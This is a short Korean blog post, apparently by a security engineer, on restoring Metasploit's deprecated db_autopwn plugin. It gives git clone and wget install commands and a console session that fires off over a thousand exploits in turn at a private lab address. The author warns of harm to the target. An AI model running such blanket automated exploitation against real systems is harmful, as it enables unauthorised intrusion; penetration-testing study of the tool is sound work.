전설처럼 내려오는 db_autopwn 코드를 통해 따로 plugin으로 넣어준다면 지금도 충분히 사용 가능합니다.
다만 이로인해 Metasploit의 동작에 문제가 생길 수 있고 대상 시스템은 당연히 큰 타격을 입게되니 재미로만 보시는게 좋을 것 같습니다. db_autopwn.rb 코드는 구글링을 통해 찾으시거나 제 git에서 긁어서 사욯하시면 됩니다.
(https://github.com/hahwul/metasploit-db_autopwn)
Install
코드만 있다면 일반적인 metasploit plugin 설치와 동일합니다.#> git clone https://github.com/hahwul/metasploit-db_autopwn
또는..
#> wget https://raw.githubusercontent.com/hahwul/metasploit-db_autopwn/master/db_autopwn.rb
하여 db_autopwn.rb 파일을 받아줍니다. 이 파일을 metasploit의 plugin 디렉토리에 넣어줍니다.
#> cd metasploit-db_autopwn
#> cp db_autopwn.rb [your_metasploit_dir]/plugin
끝!
Usage
#> msfconsoleHAHWUL > load db_autopwn
[*] Successfully loaded plugin: db_autopwn
HAHWUL > db_autopwn -p -R great -e -q 192.168.56.101
[-] The db_autopwn command is DEPRECATED
[-] See http://r-7.co/xY65Zr instead
[*] (1/1301 [0 sessions]): Launching exploit/bsdi/softcart/mercantec_softcart against 192.168.56.44:80...
[*] (2/1301 [0 sessions]): Launching exploit/freebsd/http/watchguard_cmd_exec against 192.168.56.44:80...
[*] (3/1301 [0 sessions]): Launching exploit/linux/antivirus/escan_password_exec against 192.168.56.44:80...
[*] (4/1301 [0 sessions]): Launching exploit/linux/http/accellion_fta_getstatus_oauth against 192.168.56.44:80...
[*] (5/1301 [0 sessions]): Launching exploit/linux/http/advantech_switch_bash_env_exec against 192.168.56.44:80...
HAHWULSecurity engineer, Gopher and H4cker! |
0 개의 댓글:
Post a Comment